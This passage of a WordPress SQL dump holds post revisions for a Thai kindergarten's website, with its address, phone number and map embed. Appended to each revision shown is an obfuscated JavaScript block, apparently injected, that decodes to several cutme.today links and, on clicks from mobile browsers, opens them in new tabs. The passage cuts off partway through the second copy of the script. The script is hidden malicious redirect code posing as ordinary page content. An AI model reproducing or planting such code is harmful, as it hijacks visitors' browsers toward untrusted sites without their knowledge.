":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-07-29 18:58:42','2024-07-29 11:58:42','',19,'http://watprato.ssk.in.th/?p=139',0,'revision','',0),
(140,1,'2024-07-29 19:00:17','2024-07-29 12:00:17','<!-- wp:generateblocks/image {\"uniqueId\":\"b136f372\",\"mediaId\":141,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-b136f372\"><img class=\"gb-image gb-image-b136f372\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/434328136_122134060850202781_9108992241821579810_n.jpg\" alt=\"\" title=\"434328136_122134060850202781_9108992241821579810_n\"/></figure>\n<!-- /wp:generateblocks/image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const 